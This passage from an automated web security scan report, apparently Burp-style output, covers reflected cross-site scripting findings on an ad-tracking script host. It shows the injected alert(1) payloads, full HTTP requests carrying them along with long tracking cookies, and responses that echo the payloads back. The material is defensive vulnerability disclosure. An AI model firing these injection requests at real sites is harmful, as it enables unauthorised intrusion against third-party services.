ginheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=6&pubId=398&ran=0.1927952092951985633c57'-alert(1)-'f87ac0b58b4&pageURL=http://www.pubmatic.com/">
...[SNIP]...
2.100. http://js.revsci.net/gateway/gw.js [bpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f3ae'%3balert(1)//c43dde16a24 was submitted in the bpid parameter. This input was echoed as 8f3ae';alert(1)//c43dde16a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?csid=G07610&bpid=S02778f3ae'%3balert(1)//c43dde16a24 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+epi+gzC9/vSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFhOw3uzxK/X4Wxo4bJAn8weCR02tpdbg/bYqVKAiPNbO41848Z9KpOZKRQN0OL0sNJ8kypkLypj36j7Rm+95zJAPtLzSvq8LWyyFTHdPsSmDFFA0qN+hBON4H4Tla7JACrXtwZLbYkaPwY2qoG7JOev/Lg0kSAEhAN2j3I9if3B+HvsTrxBc9VsohGW/b5fsT/tmOND8GjL62aEQOR/ttAt0Onz37bTRxfaITzexWf8P4aLkngBQJFzAETbKu4iCLf6EtYpH/CugM6sxzwqlgJTBZx1A1ese7+q70nG0SvwKBqGIcTjIrFSjkDn5CzxinzmiyVAsj6DVZYCcQpO4K6wrWzDkpOGhK634uztGpLBxzNDkL2iLHVGdEKz5Km4E8XnMsb2RyQbsw85L6avb/ndujGtWPB5NktpSBX1O6xykGxIlNcuEc5A5TFcViyPHJABw0+SY5WKWD8c2KF7QNnJTYgtZ3vm04i/IDcOYg2G5ip1hh4c1VnrEwseNA7qKF/Cy3/YzH+zE075ArEjlj9BV5xbUneXnlUeWlupie2OZe8u2ys5vCR9G9DnRtFNHmqqqFsP1L8ZVcernhjIjN6695svzJRD24Wa6NO2oyXiieRAotYX9Fznu+/iFDnFKMY6gcKtR40K5DJPZ; rtc_8VB0=MLvv+TMxJrhm57bv/Fuqg2mNrsYwJCwK+v7dHsmDb2IH8Z6qKwZuahTDDtXIW/Zj+Bka3uadtAsIrzjpxbUEOscrfkkoUKYGbbQo+GCjROUJQl4T4uztdiTfKoCJu0JcST7kTxGI7wsX+Qro7lxX17foIrA1qd1Nf0HSMYaH29l1JUQ8p00w8ygOQ26ZhJSo6BNhPgt1f/MyPBe0p9wtPYkf+djL2uU+TuznLtnPn4sfYYrCXBL6f08WnLyZ4Mm4O6NagBnnWPnDLYAz5Ml10TDT8REQDGXwDo9VRrMRR4uvxnLDERRsk1GGsr4NZMzrT6EkXpIEqOhWMuZ+QuscSFhSWdF16himAhxWk3NpqbtLRifpxDNqkEugiwq7EKio5yHmLXuCHqPLXqmVfZiFDtbdNyK2pPZeN7We+keVkFZ0hetlrVVYG3JmX6R4ukl1ZusiPOx3Qw4oU0u91k+Sr/M2eJycd+m80XK8Upy0DtU0A5EmxVmvRV3m7tFL5Q8+AX0Wr9D/HQpHIAb1IfBNY5YITgUaq80nAJwBn0n0htK+3O7+x3ZtE6xLOKBK13RLR8ERpR/LRa5FF3a9SEBdfIXBTuYDOdpikFej3r0qGeJ5Om0HEUeBjQlXvnJvLXc9p6KZIUzzAqF7YgHXr/ssjTtOvOMa/E+E17f7boO/vuSsT44TU4DGcZDudNpOHDIHDGAQr0bR9vVCwsK4hjh+QY8XDp1z/c5+CbXgmgVxrM4f3U9sZ0swN8/DxOvWTjiD9/uzE0lORuUQLnjI6s48lV7mkFriiLosH2vBtXPi/ydrIq+X/AmWwznCWnnkg5nmC3a8U8nIhXMUrA7jxqZedfN0/s0DkOdspMGmZeaiEtKRbbTDFfStmi5tGBZckkMM11qoTxhJSPMJaZLJ51wGknFfqtc1T3RtbQulHAkp+Ltlj+Muxy5K6G7IlPzGHrTE/LBMbadby1REIkbMXRcQjQNF3cgz6yJCgRJGS0SSj7g66Zla2w2ffnNUeWXX72YKpyoB4DZd6BIvwwr8x+pfqIQ63j4nZywNVhm6KvMzpsRpp0M0U40BluLMIpyt2VTRAe8UzEHTiXMcxIsbcjPTTyl+rVxA7uZxlpnUDFiAHCkQyNx8lDntem0IMN/TME6N+FbB2qZVGmqtELYHOSHbSCRfcCqY5UfhXQwUte8dptRoBhOCVkZNzF1TBPhAvvQ9zI6kJSCY64YG6KdLPDvyH8rS9z3qE2LHjIfgth44b/UAMzcgDXS2Ymj0kJ7Ir9eyKJ9JlW7lMOL/mPQtT+3U4eR6SKh6cL2OnpqEVSKgx0ECiLmWwjVn9JJhKqo/u/j4FYQXsO6TJy/rgMI6M69+77qN2OthiG7z3StQuyBoyPmU+dzshtM+jLpaaw8SUgxJtfhCs/KofRGhn04a957Um+FeEJGidW8K+I88fBGmvqBR51mSJTKUTsx9E8a9uYStaiofZNEaqevhA36RH9KJeJBkiowT1FCKA/MwpapC0qqBXVD27tjf2KNTkXzs2LEnwyRfMtACpu3Odskm6ZrhgD7muKTkInsc4QFj6gVXN2haKycJ2uynSSm+get4DcdWJnpS0UYIlrolebv9yQuFQMPkJNemRw6EDMIdg7BipgA8l8UtxfeO1Wr4hYQYwWj3TzQfWo5d95HeMqfDjULMLDn5qZciUs4Oc94YAZBECV1zyoU0T+brzU44LI9ZhN9R3/VxuPVHKmwA4tH3B7creYHjVcf2TpLSvIfhi+cW7F44rP5huqnEJ0jUD4clCALbI5sQO5sfqH60Bj9vaknO0OBhUtN3NoD1rgDvO/OOitGYDZnrNdgXL+G7xWqjnCB3G2VmLiyNgbNCDcNTjHSqdeG1AE4D23EZfvR6sb2sJpknNYuPmxnzj4/VsO9TaqoH+Oh/eJJwGO+VWFJ5Pcyexs/EHfkh2QrhqL27KSiE9YizXJS2nfZcvmcUWT8xMrD6KongMT82poOUH580aglgV3GZDHBxQm8D+VTQWNMk2FwbgNGI4vLRwIHZ8GEty7I74fyHw76rsiRrCSKJxMfVk9HqiKIjUwLuytBz8q1CkV9oQEoiTZ2o/9NbXQzfbRSnZo5cQbeTBLNvPsZFUgqZpAsKUOzzUpvPb1VEVli9/YDtKL04kVD6FS0pR/++4YUQiRO/4WIZZfMUa81tZeZTbxDHXviSXWK6nIBGRAZvHn7HTX9VOAFH0KJ8lYVkn9g/j4L97xdWkWWi5Iv/VhNcaydNycyzzfOmLCxR0t6DUEO1mJzQ/zf/t7MLT8NMeAFGyLmTM6rk6QFX3uOFFeY8XAENtaEcK8NytHL3CPo0sUvJvFaZX4YwpKgFUgojwze1TeDQD7vh2e7RKq6eYciVXHkH8jjPFhTliJBcBo9g4lYyYER2AU5pOYyAt2PEuDwTEeSy86Cvc51IVw9O/BYBGuZ4fc2GURzugBaY4PVF0qXTcR/3c1CA7bCkbdeY2h54U0CSdavrePhNL+/XNQpXVfojlsqvdK8LUYOyaN20Oevq+dZa2BQG/jVfhTNPjee6IClo7sjEOGnY8yELeMxKR3jkF7Cm0KfP+QHKtsYQoBBhbUe9iYqk8TieB5/8A+i+0Vs8O8d1R5BwCT49iHs1gnm3ezAwXJl8McadfzhCdI4V8qYCEo1rbSWCwsETSVEegCC0T6LQFHYlBRiJqMiOSzPk2DRjEcvhZrugeSi1Us+fOlU9CHzPb9QiOpEVaBcYaBR/IEa71WWQK6jXMY1SRjZzrRqiNfgTu6fYq/XIoxXezKHfIwOaiMA=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39zMJZjpn557JwHIRqQjg4NJ56yd8VNTcwHvXKY2j86DzzC9h18LIqIAEiQUbBEgS1qnrAGsS3AmIZhAkRm4O8HmsRRFBNnYYhKP0pvn6ci0/k/XJXf/YR0wR28cb58KaGgKcALzZ/gGKvpgsn3TZxqUsLEJP4LjKxRM1VpjCA6BEtxzHR9Jy5ikb8xmSYamenQ7DU4G+9u1H/00RLBaxuPbIxWIkAjjjRFJ5Ae37nycffgEH0zpACrrbhe8O3b4YkbV5V2fwQGDzIOsjI+L46IREGYP3xgjWcglkIJBtCmKEWOHP5SDuCatHEuXXjaz/UTSd2+oWVj9yBNSkAJ2Lf1pf1EXshUyadIy4TdOiiVS8U0QxyqtWCTjZgAU0VBUVBO4YFImrJQIwCA4E82PQhdgcKRyJmSbWRotQQcccJBfe0W7s96N7QeZjMjX9yZWzWj+MOI0Iqvvy4O8UI2HT3olT4VwVrJ54E8ZoeoXCVlVFQG6MqWb2OCHtTc6LjowpgC5dluOOaUO0tDsT7qpf6MB1CKUuvIQAnPJgfcO+i7EV8k7/WIWI9j3lnFQJOylU+DdtKlE8845hox3ENZvGE1o8aF+UnIHBhOBGu3/J5rSMJ5HHqve2KC6PM6LBls+o3BlUio0gdasO+J59I7X5NIm9xgJYQilisK+sVy+BWLthHSYahPGbswvTtZccT9+SsWMSQxsAmZBz0h2xzmutsskqfFyuAqm6mZWTnFLemB1Gx26fRgvVWMJVFpcH+rHPXYBQxAu3aXZYOjsuwjgJoQgCWsrnvMAz9g2T0ibbncF++W0v7u2YF7UOykhmYoOEvHbl1+mduzj0lnKoZlw6xxQJOzjxFfZxHtQuhPdEytbTeVNYhm4yTlurtj1LKw7frMGodRkF8/FSbsrMwla5uepMkIQfAnZv+gmGF/5aVgBBKHkKW4dvhpIV557IqotUalE8EYKhDPd0cZjhQaA2Dz4/7GirtoHS2sU5+Amq9nK/PMHYC3Nz7b4DiWvZXqWMWsDpLlsJBktr95mLhYhNk0ET9DbfpJH4Qz3/rLPSsRdsH3ruWS5Bjnhu6U8ScR0MzqiPzpk7FrHyZs5c3VActGSe0bIYd/hnIis2trp19pPgqMI3O+vGADtiubcr8aRQVox9Din0pRpQjgG3MwNjHniJzpRcpcJ+rupF1X7Zs5Fz/RogaxO2jHM++gTiBokSpXL8HuY4ZXL54e47wyqomaYykNgzLww47G0JJ27dok7EDLp9lVnOZoTzjtKxyOP3G1YheVTT9YD7vaaBDJzqueDjtHIf4oGlqdDvAhYY7EH2zDdxZUTzU484IvvGHGD7e6FXt2/Mp0ui0tFBTiwHqQTUc6MCtYmomot//wtCxY3BiNevsigm4KEOrkw5iTZAVdnP9ViqNEzWsp2WrSyHP2ktAjYoFtNuNAViRWbMAt+1rNGRznBBSDf6tWWa+aA6jWc+2yZ+TEQ1fTapHSmDd9fnfnGt0127oJy9+XChqVSKAdQyuRsSjN7uHd41zykqQH/VclcOclM/qv8I0RZ/398meN11UyV76PwiY1s8fclDDFhbfLMexxbQTn58QHt/MtvMFZkqk5wYc1kwYzs=; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:30 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:33:29 GMT
Content-Length: 6560

//Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
i>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S02778f3ae';alert(1)//c43dde16a24');else DM_addEncToLoc("bpid",'S02778f3ae';alert(1)//c43dde16a24');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChil
...[SNIP]...
2.101. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ad57a<script>alert(1)</script>db723b0c3cf was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K05540ad57a<script>alert(1)</script>db723b0c3cf HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR